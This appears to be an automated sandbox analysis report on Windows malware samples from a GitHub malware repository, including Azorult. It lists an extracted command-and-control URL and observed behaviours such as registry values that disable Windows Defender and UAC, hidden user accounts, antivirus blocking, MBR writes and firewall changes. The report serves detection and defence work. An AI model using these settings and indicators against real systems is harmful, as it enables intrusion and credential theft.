Analysis
-
max time kernel
620s -
max time network
619s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
29/03/2025, 15:22
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Da2dalus/The-MALWARE-Repo
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
https://github.com/Da2dalus/The-MALWARE-Repo
Resource
win10v2004-20250314-en
General
-
Target
https://github.com/Da2dalus/The-MALWARE-Repo
Malware Config
Extracted
azorult
http://boglogov.site/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Azorult.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" taskhostw.exe -
Rms family
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 5024 created 5108 5024 taskmgr.exe 137 PID 5024 created 5108 5024 taskmgr.exe 137 -
UAC bypass 3 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" regedit.exe -
Windows security bypass 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths regedit.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 4664 net.exe 3284 net1.exe -
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" Azorult.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" Azorult.exe -
Downloads MZ/PE file 5 IoCs
flow pid Process 141 3840 chrome.exe 141 3840 chrome.exe 141 3840 chrome.exe 141 3840 chrome.exe 141 3840 chrome.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Azorult.exe -
Modifies Windows Firewall 2 TTPs 23 IoCs
pid Process 4204 netsh.exe 2060 netsh.exe 3444 netsh.exe 4460 netsh.exe 992 netsh.exe 4344 netsh.exe 3684 netsh.exe 4260 netsh.exe 4164 netsh.exe 3892 netsh.exe 2536 netsh.exe 4024 netsh.exe 4868 netsh.exe 232 netsh.exe 4896 netsh.exe 3876 netsh.exe 2784 netsh.exe 1396 netsh.exe 1548 netsh.exe 4516 netsh.exe 100 netsh.exe 1360 netsh.exe 708 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe -
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 1616 attrib.exe 1172 attrib.exe 4720 attrib.exe -
Stops running service(s) 4 TTPs
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral2/files/0x0007000000024186-1014.dat acprotect behavioral2/files/0x0007000000024185-1013.dat acprotect -
resource yara_rule behavioral2/files/0x0007000000024183-974.dat aspack_v212_v242 behavioral2/files/0x0007000000024182-1017.dat aspack_v212_v242 -
Checks computer location settings 2 TTPs 15 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation taskhost.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation chrome.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation cheat.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation R8.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation winlogon.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation chrome.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation chrome.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation wini.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation winlog.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation chrome.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation Azorult.exe -
Executes dropped EXE 64 IoCs
pid Process 4416 WinNuke.98.exe 1340 xpaj.exe 4284 xpaj.exe 3684 Mabezat.exe 5108 AgentTesla.exe 2196 chrome.exe 1648 Azorult.exe 3624 wini.exe 708 Azorult.exe 2312 winit.exe 2524 rutserv.exe 3144 rutserv.exe 1400 rutserv.exe 320 rutserv.exe 3148 rfusclient.exe 4912 rfusclient.exe 3012 cheat.exe 1372 taskhost.exe 4460 P.exe 5076 ink.exe 4516 rfusclient.exe 2932 R8.exe 2292 winlog.exe 4728 Rar.exe 1908 winlogon.exe 4540 taskhostw.exe 2968 taskhostw.exe 2000 taskhostw.exe 764 RDPWInst.exe 3032 winlogon.exe 3316 RDPWInst.exe 1844 chrome.exe 4584 chrome.exe 1344 taskhostw.exe 3344 taskhostw.exe 4448 taskhostw.exe 988 taskhostw.exe 2968 taskhostw.exe 2312 taskhostw.exe 4564 taskhostw.exe 2392 taskhostw.exe 4444 taskhostw.exe 100 taskhostw.exe 2344 taskhostw.exe 2148 chrome.exe 3988 taskhostw.exe 632 taskhostw.exe 2312 taskhostw.exe 2536 taskhostw.exe 3032 chrome.exe 3580 taskhostw.exe 4608 taskhostw.exe 2812 taskhostw.exe 3516 taskhostw.exe 1548 taskhostw.exe 3220 taskhostw.exe 4448 taskhostw.exe 3624 taskhostw.exe 2528 taskhostw.exe 3564 taskhostw.exe 2108 taskhostw.exe 756 taskhostw.exe 4752 taskhostw.exe 1692 taskhostw.exe -
Loads dropped DLL 22 IoCs
pid Process 2196 chrome.exe 2196 chrome.exe 736 svchost.exe 1844 chrome.exe 1844 chrome.exe 4584 chrome.exe 4584 chrome.exe 2148 chrome.exe 2148 chrome.exe 3032 chrome.exe 3032 chrome.exe 560 chrome.exe 560 chrome.exe 1100 MsiExec.exe 1100 MsiExec.exe 1100 MsiExec.exe 1100 MsiExec.exe 1100 MsiExec.exe 1100 MsiExec.exe 1100 MsiExec.exe 1100 MsiExec.exe 1100 MsiExec.exe -
Modifies file permissions 1 TTPs 62 IoCs
pid Process 1564 icacls.exe 4416 icacls.exe 4212 icacls.exe 3344 icacls.exe 4368 icacls.exe 4568 icacls.exe 4032 icacls.exe 4212 icacls.exe 960 icacls.exe 3988 icacls.exe 1712 icacls.exe 708 icacls.exe 3580 icacls.exe 1636 icacls.exe 5096 icacls.exe 3052 icacls.exe 4024 icacls.exe 3876 icacls.exe 3032 icacls.exe 1960 icacls.exe 3116 icacls.exe 3108 icacls.exe 2840 icacls.exe 116 icacls.exe 4668 icacls.exe 2756 icacls.exe 4360 icacls.exe 3340 icacls.exe 4944 icacls.exe 3672 icacls.exe 3508 icacls.exe 3796 icacls.exe 3032 icacls.exe 4688 icacls.exe 4752 icacls.exe 2724 icacls.exe 1580 icacls.exe 3400 icacls.exe 5056 icacls.exe 2784 icacls.exe 3796 icacls.exe 1548 icacls.exe 3920 icacls.exe 2872 icacls.exe 3260 icacls.exe 4068 icacls.exe 3796 icacls.exe 992 icacls.exe 4356 icacls.exe 2304 icacls.exe 3684 icacls.exe 4360 icacls.exe 3940 icacls.exe 4968 icacls.exe 2224 icacls.exe 3584 icacls.exe 4380 icacls.exe 4972 icacls.exe 3116 icacls.exe 1360 icacls.exe 5096 icacls.exe 2700 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 321 5024 msiexec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe -
pid Process 5008 powershell.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\u: xpaj.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\x: xpaj.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\i: xpaj.exe File opened (read-only) \??\y: xpaj.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\p: xpaj.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\e: xpaj.exe File opened (read-only) \??\g: xpaj.exe File opened (read-only) \??\j: xpaj.exe File opened (read-only) \??\k: xpaj.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\l: xpaj.exe File opened (read-only) \??\s: xpaj.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\o: xpaj.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\m: xpaj.exe File opened (read-only) \??\t: xpaj.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\r: xpaj.exe File opened (read-only) \??\v: xpaj.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\h: xpaj.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\n: xpaj.exe File opened (read-only) \??\q: xpaj.exe File opened (read-only) \??\w: xpaj.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
flow ioc 138 raw.githubusercontent.com 141 raw.githubusercontent.com 223 raw.githubusercontent.com 238 raw.githubusercontent.com 246 iplogger.org 247 iplogger.org 139 raw.githubusercontent.com 202 raw.githubusercontent.com 224 raw.githubusercontent.com 239 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 216 ip-api.com -
Modifies WinLogon 2 TTPs 7 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Azorult.exe -
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 xpaj.exe File opened for modification \??\PHYSICALDRIVE0 xpaj.exe -
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000500000002043c-882.dat autoit_exe behavioral2/files/0x0007000000024184-952.dat autoit_exe behavioral2/files/0x000700000002418d-1052.dat autoit_exe behavioral2/memory/3032-1174-0x0000000000DD0000-0x0000000000EBC000-memory.dmp autoit_exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\GroupPolicy powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini powershell.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI powershell.exe File created C:\Windows\System32\rfxvmt.dll RDPWInst.exe -
Hide Artifacts: Hidden Users 1 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" reg.exe -
resource yara_rule behavioral2/files/0x0007000000024186-1014.dat upx behavioral2/files/0x0007000000024185-1013.dat upx behavioral2/files/0x00070000000241a1-1123.dat upx behavioral2/memory/1908-1129-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral2/memory/1908-1154-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral2/files/0x00070000000241ba-1168.dat upx behavioral2/memory/3032-1173-0x0000000000DD0000-0x0000000000EBC000-memory.dmp upx behavioral2/memory/3032-1174-0x0000000000DD0000-0x0000000000EBC000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libmad_plugin.dll xpaj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.OleDbInterop.dll xpaj.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\msedgeupdateres_tr.dll xpaj.exe File opened for modification \??\c:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\clrcompression.dll xpaj.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\it\System.Windows.Presentation.resources.dll xpaj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONCONTROL.DLL xpaj.exe File opened for modification \??\c:\Program Files\Mozilla Firefox\xul.dll xpaj.exe File opened for modification \??\c:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-runtime-l1-1-0.dll xpaj.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\ja\WindowsFormsIntegration.resources.dll xpaj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\excelcnv.exe xpaj.exe File opened for modification \??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe xpaj.exe File opened for modification \??\c:\Program Files\Microsoft Office\root\Client\concrt140.dll xpaj.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\de\System.Xml.Linq.Resources.dll xpaj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSVCP140_APP.DLL xpaj.exe File opened for modification \??\c:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.he-il.dll xpaj.exe File opened for modification \??\c:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\System.Linq.Parallel.dll xpaj.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\it\System.Printing.resources.dll xpaj.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\msdaprst.dll xpaj.exe File opened for modification \??\c:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Security.dll xpaj.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\msedge_proxy.exe xpaj.exe File opened for modification \??\c:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE xpaj.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\fr\Microsoft.PowerShell.PackageManagement.resources.dll xpaj.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\it\Microsoft.PackageManagement.resources.dll xpaj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\icudt58.dll xpaj.exe File opened for modification \??\c:\Program Files (x86)\Common Files\Microsoft Shared\ink\mshwLatin.dll xpaj.exe File opened for modification \??\c:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\System.Private.DataContractSerialization.dll xpaj.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\msedgeupdateres_as.dll xpaj.exe File opened for modification \??\c:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.69\elevated_tracing_service.exe xpaj.exe File opened for modification \??\c:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\System.Numerics.Vectors.dll xpaj.exe File opened for modification \??\c:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-core-interlocked-l1-1-0.dll xpaj.exe File opened for modification \??\c:\Program Files\Microsoft Office\root\Client\vcruntime140.dll xpaj.exe File opened for modification \??\c:\Program Files\Microsoft Office\root\Office16\api-ms-win-core-timezone-l1-1-0.dll xpaj.exe File opened for modification \??\c:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Xml.ReaderWriter.dll xpaj.exe File opened for modification \??\c:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\msedgeupdateres_es.dll xpaj.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\dxcompiler.dll xpaj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msvcp140.dll xpaj.exe File opened for modification \??\c:\Program Files\Java\jre-1.8\bin\jp2native.dll xpaj.exe File opened for modification \??\c:\Program Files\Microsoft Office\root\Office16\MSOSTYLE.DLL xpaj.exe File opened for modification \??\c:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Runtime.InteropServices.dll xpaj.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\msdasql.dll xpaj.exe File opened for modification \??\c:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\System.Numerics.Vectors.WindowsRuntime.dll xpaj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTOCOLHANDLERINTL.DLL xpaj.exe File opened for modification \??\c:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\msedgeupdateres_lb.dll xpaj.exe File opened for modification \??\c:\Program Files\Java\jdk-1.8\bin\jli.dll xpaj.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\it\UIAutomationClientsideProviders.resources.dll xpaj.exe File opened for modification \??\c:\Program Files\Java\jdk-1.8\bin\api-ms-win-core-console-l1-2-0.dll xpaj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.Excel.BackEnd.dll xpaj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\INTLDATE.DLL xpaj.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\System.Workflow.Activities.dll xpaj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe xpaj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\CHART.DLL xpaj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\w2k_lsa_auth.dll xpaj.exe File opened for modification \??\c:\Program Files\Java\jdk-1.8\bin\javap.exe xpaj.exe File opened for modification \??\c:\Program Files\Microsoft Office\root\Office16\OIMG.DLL xpaj.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\wdag.dll xpaj.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\demux\libau_plugin.dll xpaj.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_mlp_plugin.dll xpaj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONCHART.DLL xpaj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\DBGCORE.DLL xpaj.exe File opened for modification \??\c:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\msquic.dll xpaj.exe File opened for modification \??\c:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe xpaj.exe File opened for modification \??\c:\Program Files\Windows Photo Viewer\PhotoAcq.dll xpaj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll xpaj.exe File opened for modification \??\c:\Program Files\Microsoft Office\root\Office16\ONMAIN.DLL xpaj.exe -
Launches sc.exe 24 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2140 sc.exe 3876 sc.exe 3800 sc.exe 116 sc.exe 4608 sc.exe 2516 sc.exe 3956 sc.exe 1100 sc.exe 2528 sc.exe 2344 sc.exe 1344 sc.exe 1580 sc.exe 4868 sc.exe 4116 sc.exe 736 sc.exe 2720 sc.exe 2768 sc.exe 3108 sc.exe 1672 sc.exe 3404 sc.exe 4268 sc.exe 2664 sc.exe 2856 sc.exe 1560 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
